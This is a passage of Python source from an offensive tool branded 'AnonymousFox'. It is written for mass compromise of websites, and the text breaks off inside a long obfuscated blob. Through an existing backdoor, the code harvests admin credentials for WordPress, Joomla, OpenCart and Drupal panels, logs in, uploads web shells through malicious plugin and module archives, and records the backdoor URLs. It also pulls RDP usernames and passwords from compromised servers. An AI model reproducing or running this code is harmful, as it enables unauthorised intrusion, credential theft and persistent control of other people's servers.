getPanels = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=360)
except :
getPanels = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=500)
getPanels = content_Fox(getPanels)
if (re.findall(re.compile('target=\'_blank\'>(.*)</a><br></span>'), getPanels)):
sites = re.findall(re.compile('target=\'_blank\'>(.*)</a><br></span>'), getPanels)
else :
print(' {}[-] There is no Panels.'.format(fr))
return False
logins = []
wp = 0
jm = 0
oc = 0
for site in sites:
if (re.findall(re.compile('Login => (.*) Username => (.*) Password => (.*)'), site)) :
pp = re.findall(re.compile('Login => (.*) Username => (.*) Password => (.*)'), site)[0]
site = '{}#{}@{}'.format(pp[0], pp[1], pp[2])
if ('wp-login.php' in site) :
print(' {} - {}{} {}[WordPress]'.format(fg, fw, site, fg))
open('Results/WordPress_Panels.txt', 'a').write(site + '\n')
wp = 1
elif ('administrator/index.php' in site) :
print(' {} - {}{} {}[Joomla]'.format(fg, fw, site, fr))
open('Results/Joomla_Panels.txt', 'a').write(site + '\n')
jm = 1
elif ('admin/index.php' in site) :
print(' {} - {}{} {}[OpenCart]'.format(fg, fw, site, fc))
open('Results/OpenCart_Panels.txt', 'a').write(site + '\n')
oc = 1
logins.append(site)
if (logins) :
print('')
return logins, wp, jm, oc
else :
print(' {}[-] There is no Panels.'.format(fr))
return False
except :
print(' {}[-] Failed.'.format(fr))
return False
def uploadShellbyPanels(logins, wp, jm, oc, dp, srcShell, tyShell = 1):
try :
print(' {}[*] Upload Shell by Panels ..... {}(Waiting)\n'.format(fw, fr))
if (wp == 1) :
getFile('plugin.zip', 2)
if (jm == 1) :
getFile('mod_simplefileuploadJ30v1.3.5.zip', 2)
if (oc == 1) :
getFile('rsz.ocmod.zip', 2)
if (dp == 1) :
getFile('adminimal_theme-7.x-1.25.zip', 2)
shells = []
for login in logins:
try :
if ('/wp-login.php' in login) :
dataLogin = re.findall(re.compile('(.*)/wp-login.php#(.*)@(.*)'), login)[0]
domain = dataLogin[0]
username = dataLogin[1]
password = dataLogin[2]
if ('@' in str(username)):
last = password
passwords = username.split('@')[1:]
username = username.split('@')[0]
password = ''
for pwd in passwords:
password = password + str(pwd) + '@'
password = password + str(last)
newShell = loginWP_UP_Fox(domain, username, password)
if (newShell is False) :
print("")
continue
else :
shells.append(newShell)
newShell = check(newShell)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newShell, dom))
uploadFile(newShell, srcShell, tyShell)
elif ('/administrator' in login):
if (re.findall(re.compile('(.*)/administrator/index.php#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/administrator/index.php#(.*)@(.*)'), login)[0]
elif (re.findall(re.compile('(.*)/administrator/#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/administrator/#(.*)@(.*)'), login)[0]
elif (re.findall(re.compile('(.*)/administrator#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/administrator#(.*)@(.*)'), login)[0]
domain = dataLogin[0]
username = dataLogin[1]
password = dataLogin[2]
if ('@' in str(username)):
last = password
passwords = username.split('@')[1:]
username = username.split('@')[0]
password = ''
for pwd in passwords:
password = password + str(pwd) + '@'
password = password + str(last)
newShell = loginJM_UP_Fox(domain, username, password)
if (newShell is False):
print("")
continue
else :
shells.append(newShell)
newShell = check(newShell)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newShell, dom))
uploadFile(newShell, srcShell, tyShell)
elif ('/admin' in login):
if (re.findall(re.compile('(.*)/admin/index.php#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/admin/index.php#(.*)@(.*)'), login)[0]
elif (re.findall(re.compile('(.*)/admin/#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/admin/#(.*)@(.*)'), login)[0]
elif (re.findall(re.compile('(.*)/admin#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/admin#(.*)@(.*)'), login)[0]
domain = dataLogin[0]
username = dataLogin[1]
password = dataLogin[2]
if ('@' in str(username)):
last = password
passwords = username.split('@')[1:]
username = username.split('@')[0]
password = ''
for pwd in passwords:
password = password + str(pwd) + '@'
password = password + str(last)
newShell = loginOC_UP_Fox(domain, username, password)
if (newShell is False):
print("")
continue
else:
shells.append(newShell)
newShell = check(newShell)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newShell, dom))
uploadFile(newShell, srcShell, tyShell)
elif ('/user' in login):
if ('/user/login' in login) :
dataLogin = re.findall(re.compile('(.*)/user/login#(.*)@(.*)'), login)[0]
else :
dataLogin = re.findall(re.compile('(.*)/user#(.*)@(.*)'), login)[0]
domain = dataLogin[0]
username = dataLogin[1]
password = dataLogin[2]
if ('@' in str(username)):
last = password
passwords = username.split('@')[1:]
username = username.split('@')[0]
password = ''
for pwd in passwords:
password = password + str(pwd) + '@'
password = password + str(last)
newShell = loginDP_UP_Fox(domain, username, password)
if (newShell is False):
print("")
continue
else:
shells.append(newShell)
newShell = check(newShell)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newShell, dom))
uploadFile(newShell, srcShell, tyShell)
print("")
except:
pass
if (shells) :
return shells
else :
return False
except:
print(' {}[-] Failed'.format(fr))
return False
def run():
l = len(file_get_contents_Fox(os.path.basename(__file__)))
if (l != 313985):
f = 0
while(f == 0):
print(random_Fox(1))
def getRDP(backdor, shell) :
try :
post = {'getRDP': 'AnonymousFox'}
domain = URLdomain_Fox(shell)
print(' {}[*] Get RDP ..... {}(Waiting)'.format(fw, fr))
try :
getRDP_php = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
getRDP_php = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
getRDP_php = content_Fox(getRDP_php)
if ('Error-RDP3' in getRDP_php) :
t = re.findall(re.compile('<t>(.*)</t>'), getRDP_php)[0]
print(' {}[-] {} server.'.format(fr, t))
elif ('Error-RDP1' in getRDP_php) :
print(' {}[-] Failed.'.format(fr))
elif ('<rdp>' in getRDP_php) :
RDP = re.findall(re.compile('<rdp>(.*)\|(.*)\|(.*)</rdp>'), getRDP_php)[0]
ip = RDP[0]
user = RDP[1]
password = RDP[2]
print(' {}[+] Succeeded.\n -{} Login by IP or Domain: {}{} {}|{} {}\n -{} USERNAME: {}{}\n -{} PASSWORD: {}{}'.format(fg, fr, fg, ip, fr, fg, domain, fr, fg, user, fr , fg, password))
open('Results/RDPs.txt', 'a').write('{}\n{}:3389|{}|{}\n-----------------------------------------------------------------------------------------------------\n'.format(shell, ip, user, password))
if ('./DoneAdmin' in getRDP_php) :
print(' {}[+] Administrator.'.format(fg))
except:
print(' {}[-] Failed.'.format(fr))
_oaowtpxvobjz=((()==[])+(()==[]));__mdujlsfdmxmj=(_oaowtpxvobjz**_oaowtpxvobjz);___jalaznnmibpy=((__mdujlsfdmxmj<<__mdujlsfdmxmj));____oumrhwochlkn=((__mdujlsfdmxmj<<___jalaznnmibpy));_____ofzwawhkpwlm=((__mdujlsfdmxmj<<____oumrhwochlkn));______hotkgbptqejb=((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)));_______ivngqbogvubp=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+(__mdujlsfdmxmj<<__mdujlsfdmxmj)+(___jalaznnmibpy<<(_oaowtpxvobjz**_oaowtpxvobjz))+(____oumrhwochlkn<<(_oaowtpxvobjz**_oaowtpxvobjz))+(__mdujlsfdmxmj<<____oumrhwochlkn)+(______hotkgbptqejb<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));________gllxjolzzzsi=str("".join(chr(__RSV) for __RSV in [(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));_________oxmndrafiqej=str("".join(chr(__RSV) for __RSV in []));__________tnsgylfontpo=str("".join(chr(__RSV) for __RSV in [(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)]));___________lcelswcurccv=str("".join(chr(__RSV) for __RSV in 
[((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)]));____________zrifvklmlffp=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)]));_____________ifaofoxoiqai=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)]));______________fwngkcppvzpo=str("".join(chr(__RSV) for __RSV in [(_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));_______________xauosrpzfmjt=str("".join(chr(__RSV) for __RSV in 
[((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));________________qhlfeeufkrim=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumr
hwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));_________________bpssooleeakr=str("".join(chr(__RSV) for __RSV in 
[((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_
oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));________________
__mkgflhargygg=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb),(_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb)]));___________________nhavpoehslrx=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__
mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));____________________thusooxbhctn=str("".join(chr(__RSV) for __RSV in 
[((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+